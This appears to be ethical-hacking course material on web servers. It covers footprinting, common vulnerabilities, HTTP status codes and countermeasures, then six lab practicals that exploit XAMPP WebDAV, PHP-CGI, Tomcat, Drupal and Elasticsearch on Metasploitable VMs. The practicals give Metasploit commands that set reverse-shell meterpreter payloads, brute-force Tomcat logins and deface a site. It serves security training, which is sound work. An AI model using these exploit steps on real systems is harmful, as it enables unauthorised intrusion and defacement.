Web Servers

Web Server is a computing system that runs on server OS to process the

HTTP/HTTPS requests and serve the web pages on the world wide web. The
pages delivered are HTML documents, which may include images and scripts in
addition to the text content. Clients use a web browser to interact with the web
server.
Any computer can be turned into a Web server by installing server
software and connecting the machine to the Internet. There are many Web
server software applications like Xampp, Apache, Nginx, IIS web server, etc.

How Web Servers Work?

When a user requests a web page hosted on the internet, the web server
responds with that requested page. The below image represents this process.

Obtaining the IP Address from domain name: Web browser first obtains the
domain name and resolves it to IP address. It can obtain the IP address in 2
ways:
1. By searching cache.
2. By requesting one or more DNS Servers.

After knowing the IP Address, the browser now demands a full URL from the
web server. The web server responds, by sending the requested page to the
browser, and if, the web page does not exist, then it will display an appropriate
error message. The browser renders the response received from the server to
display it on the screen.

List of popular web servers

The following are a list of the common web servers:
Apache – The commonly used web server on the internet. It is cross-platform
application software, but it is usually installed on Linux. Most PHP websites are
hosted on Apache servers.

www.hackerschool.in
Internet Information Services (IIS) – It runs on windows and is the second
most used web server on the internet. Most websites built using ASP.Net are
hosted on IIS servers.

Apache Tomcat – Java server pages (JSP) websites are hosted on this type of
web server.

Other web servers – Novell's Web Server, IBM Lotus Domino servers,
Cloudflare web server, Oracle web server, Lightspeed servers, Amazon web
server, Google web server, Nginx, etc.

Footprinting Web Server

● Attackers use ID Serve, Netcraft, HTTP Recon, Whois tools to get details
about the target server.
● Use robot’s exclusion protocol, a standard used by websites to
communicate with web crawlers and other web robots to gather some
sensitive information.
● This file (robots.txt) will inform the web robot about which areas of the
website should not be processed or scanned.
● By performing the DNS enumeration, we can get the dns records and
types of servers.

Web Server Vulnerabilities

The following vulnerabilities are most commonly exploited in web servers:
● Improper file and directory permissions.
● Unnecessary services enabled, including content management and remote
administration.
● Improper authentication with external systems.
● Default accounts with default or no passwords.
● Misconfiguration in web-server, operating system or network.
● Bugs in server software, OS or web application.
● Lack of security policy and procedures

Types of Attacks possible against Web Servers

Denial of Service Attacks – With this type of attack, the web server may crash
or become unavailable to the legitimate users.

Domain Name System Hijacking – In this type of attack, the DNS settings are
changed to point victims to the attacker’s web server. All the traffic was
supposed to hit a malicious server.

Sniffing – Unencrypted data sent over the network may be intercepted and used
to gain unauthorized access to the web server.

www.hackerschool.in
Defacement – In this type of attack, the attacker takes advantage of
vulnerabilities in the web server to replaces the organization’s website with a
different page that contains the hacker’s name, images and may include
background music and messages.

Impact of Web Server Attacks

● Easy to compromise user accounts.
● Gaining root access to other applications on servers.
● Access to confidential data (Data tampering/Data theft).
● Perform Web Application attacks.
● The compromised web server can be used to spread malicious software
on the internet, which can infect users who visit the compromised
website.
● Compromised user data can be used for fraudulent activities.
● An organization’s reputation can be ruined.

Identify Vulnerabilities on Web Server

● Perform vulnerability scan to identify weaknesses in a network and
determine if the system can be exploited.
● Use vulnerability scanners like Sparta, Nikto, HP Web Inspect, Acunetix
Web Vulnerability Scanner to find out hosts, services, and vulnerabilities.
● Sniff the network traffic to identify vulnerabilities on active systems or
network services.
● Test the web server infrastructure for any misconfigurations, outdated
content, and vulnerabilities.

Webserver response codes

Webserver response codes are also known as Hypertext Transfer Protocol
(HTTP) response status codes. Status codes are issued by a server in response to
a client's request made to the server. The Internet Assigned Numbers Authority
(IANA) maintains the official registry of HTTP status codes.

All HTTP response status codes are separated into five categories. The
first digit of the status code specifies one of five standard classes of responses,
while the last two digits do not have any classifying or categorization role.
There are five classes defined by the standard

• Informational responses (100–199),

• Successful responses (200–299),
• Redirects (300–399),
• Client errors (400–499),
• and Server errors (500–599).

www.hackerschool.in
Common HTTP Status Codes
Status code Description
200: OK The request is OK.
A link list. The user can select a link and go to that
300: Multiple Choices
location. Maximum five addresses.
301 Moved Permanently The requested page has moved to a new URL.
The requested page has moved temporarily to a
302 Found
new URL.
The requested page has moved temporarily to a
307 Temporary Redirect
new URL.
400 Bad Request The server did not understand the request.
The requested page needs a username and a
401 Unauthorized
password.
403 Forbidden Access is forbidden to the requested page.
404 Not Found The server cannot find the requested page.
405 Method Not Allowed The method specified in the request is not allowed.
The request took longer than the server was
408 Request Timeout
prepared to wait.
410 Gone The requested page is no longer available.
The request was not completed. The server met an
500 Internal Server Error
unexpected condition.
The request was not completed. The server did not
501 Not Implemented
support the functionality required.
The request was not completed. The server
502 Bad Gateway received an invalid response from the upstream
server.
The request was not completed. The server is
503 Service Unavailable
temporarily overloading or down.
The server is stating the account you have currently
logged in as does not have permission to perform
550 Permission Denied the action you are attempting. You may be trying
to upload to the wrong directory or trying to delete
a file.

www.hackerschool.in
Countermeasures
● Scan for existing vulnerabilities, patch and update the server software
regularly.
● Block all unnecessary ports, ICMP traffic, and unnecessary protocols.
● Consistently apply the latest software patches and update system
software.
● If remote access is needed, make sure that the remote connection is
adequately secured, by using tunneling and encryption protocols.
● Stop running vulnerable applications on the server, such as WebDAV.
Unnecessary applications can be removed on a server by using
Add/Remove Programs in the Windows Control Panel.
● Perform bound checking on input for web forms and query strings to
prevent buffer overflow or malicious input attacks.
● Disable remote administration.
● Avoid printing error messages.
● Enable auditing and logging.
● Use a firewall between the web server and the Internet and allow only
necessary ports (such as 80 and 443) through the firewall.
● Replace the GET method with the POST method when sending data to a
web server.

www.hackerschool.in
 INDEX
S. No. Practical Name Page No.
1 Scanning Web Server using Nikto 1
2 Hacking webserver using Metasploit framework 3
3 Hacking web server with the help of vulnerability in PHP 5
4 Hacking Tomcat Web Server with Metasploit Framework 8
5 Exploiting the vulnerable Drupal using Metasploit 13
Exploiting the Remote Code Execution vulnerability in Elasticsearch
6 16
Web application

THIS DOCUMENT INCLUDES ADDITIONAL PRCTICALS WHICH MAY OR MAY NOT BE COVERED DURING
CLASSROOM TRAINING. FOR MORE DETAILS APPROACH LAB COORDINATORS
 Practical 1: Scanning Web Server using Nikto
Description: In this practical you will learn how to scan web servers and identify
vulnerabilities present in web servers, using the Nikto tool.

Step 1: Nikto is used to identify vulnerabilities and misconfiguration on the server

that hosts web applications.
● Syntax: Nikto -h <target web site>

● This tool will list possible vulnerabilities that can help an attacker to gain
access to the target server. In the above screenshot, the target website
http://testphp.vulnweb.com is not running XSS-Protection Header (possibility
of XSS vulnerability) and anti-clickjacking X-Frame-Options header which
can allow attackers to perform web-application based attacks on the target
website.

1|Page
www.hackerschool.in
 2|Page
www.hackerschool.in
 Practical 2: Hacking webserver using Metasploit framework
Description: in this practical we try to exploit weak WebDAV passwords on
XAMPP servers, using one of the Metasploit modules. It uses supplied credentials to
upload a PHP payload and execute it, and gives reverse connection from the server.

Step 1: To run Metasploit Framework, execute the following commands in terminal

● service postgresql start
● msfconsole
● search for xampp_webdav

Step 2: Load exploit by executing the following command

Step 3: To view the exploit options, execute show options command

3|Page
www.hackerschool.in
Step 4: set the RHOST value

Step 5: Set the WebDAV server path to the PATH option

Step 5: Set meterpreter payload

Step 6: Set payload options (LHOST and LPORT)

Step 7: Execute the exploit to gain access to web server.

4|Page
www.hackerschool.in
Practical 3: Hacking web server with the help of vulnerability
in PHP.
Description: in this practical we exploit the web servers running php 5.2.4, using
Metasploit framework.

Step 1: This practical works on web servers running PHP version 5.2.4. In this case,
we are considering Metasploitable2 OS as target machine.
● Load Metasploit Framework

Step 2: Search and load the php_cgi_arg exploit.

5|Page
www.hackerschool.in
Step 3: Verify and configure required exploit options. Set a meterpreter payload to
gain more control on the target server.

Step 4: Once everything is configured, execute the exploit command to gain reverse
connection.

6|Page
www.hackerschool.in
Step 5: With the help of the meterpreter session, we can deface the website located in
the web root of the target server. Execute ls command and look for the index.php
page, remove or replace this page with customized php page.

7|Page
www.hackerschool.in
 Practical 4: Hacking Tomcat Web Server with Metasploit
Framework.
Description: in this practical we try to exploit apache tomcat server. First using one
of the Metasploit modules we perform brute force attack on tomcat server, if we got
login credentials, we proceed to the next step that is exploiting the server. We use a
module that can execute a payload on Apache Tomcat servers that have an exposed
"manager" application.

Step 1: This practical works on web servers running tomcat server version 5.5. In
this case, we are considering Metasploitable2 OS as target machine.
● Start Metasploit framework

Step 2: At first, we need to crack username and password of tomcat service. Search
for tomcat and select auxiliary module to crack the password

8|Page
www.hackerschool.in
Step 3: Load auxiliary, verify options and configure RHOSTS, RPORT values

Step 4: Execute exploit command to crack username and password of tomcat service.
In the results, a line which shows Login Successful indicates username, password of
tomcat service.

9|Page
www.hackerschool.in
Step 5: Now, as we know login credentials, we can start exploiting the target. Search
for tomcat in Metasploit framework and select
exploit/multi/http/tomcat_mgr_deploy

Step 6: Load exploit and configure HttpPassword, HttpUsername to above-

gathered password and username of tomcat service. RHOST, RPORT to target’s IP
address and port number respectively.

10 | P a g e
www.hackerschool.in
Step 7: Configure a payload from available list of payloads and set payload options.

11 | P a g e
www.hackerschool.in
Step 8: Execute exploit command to gain meterpreter session.

12 | P a g e
www.hackerschool.in
Practical 5: Exploiting the vulnerable Drupal using Metasploit
Description: In this practical we will learn how to exploit the SQL injection
vulnerability present in the vulnerable Drupal version, and how to get php reverse
shell from that, using the module available in the Metasploit framework.

Step 1: Start Metasploitable3 ubuntu virtual machine and we identified that Drupal
Content Management System was running on 80 port.

Step 2: Open Metasploit framework and search for Drupal exploits.

13 | P a g e
www.hackerschool.in
Step 3: Execute the following command to load the exploit module.
● Command: use exploit/multi/http/drupal_drupageddon

Step 4: List the options available in the exploit module using show options
● Command: show options

Step 5: Configure the target IP to RHOSTS and target domain to TARGETURI

using the below commands.
● Syntax: set RHOSTS <Target IP>
▪ set TARGETURI <URL address of target>
● Command: set RHOSTS 10.0.2.15
▪ set TARGETURI drupal/

Step 6: Set payload by executing the following command.

● Command: set payload php/meterpreter/reverse_tcp

14 | P a g e
www.hackerschool.in
Step 7: Configure the attacker IP and port to the payload by executing the following
command.
● Syntax: set LHOSTS <Target IP>
▪ set LPORT <attacker port number>
● Command: set LHOSTS 10.0.2.4
▪ set LPORT 4545

Step 8: Execute the exploit command to start exploiting the vulnerability present in
the Drupal, after successful exploitation we will get a meterpreter session.

Step 9: Execute the following command to get target system information.

15 | P a g e
www.hackerschool.in
 Practical 6: Exploiting the Remote Code Execution
vulnerability in Elasticsearch Web application
Description: In this practical we will learn how to exploit the remote code execution
vulnerability present in Elasticsearch web application and gaining access to the target
system.

Step 1: After scanning the metasploitable3 windows server 2008, we will find
Elasticsearch is running on port 9200.

Step 2: Search for any exploits available in the Msfconsole. After searching we
identified the RCE exploit, we will use that to exploit the vulnerability in
Elasticsearch.

16 | P a g e
www.hackerschool.in
Step 3: Configure the above highlighted exploit module using the following
command.
● Command: use exploit/multi/elasticsearch/script_mvel_rce

Step 4: Execute show options to see the available options for exploit.

Step 5: Set TARGETIP in the RHOSTS by executing the following command.

● Syntax: set RHOSTS <Target IP>
● Command: set RHOSTS 10.0.2.5

Step 6: Set payload by executing the following command.

● Command: set payload java/meterpreter/reverse_tcp

17 | P a g e
www.hackerschool.in
Step 7: Set LHOST and LPORT options by executing the following commands.
● Syntax: set LHOSTS <Target IP>
▪ set LPORT <attacker port number>
● Command: set LHOSTS 10.0.2.4
▪ set LPORT 4567

Step 8: Execute exploit command to start exploiting the vulnerability and gain access
to the target system

18 | P a g e
www.hackerschool.in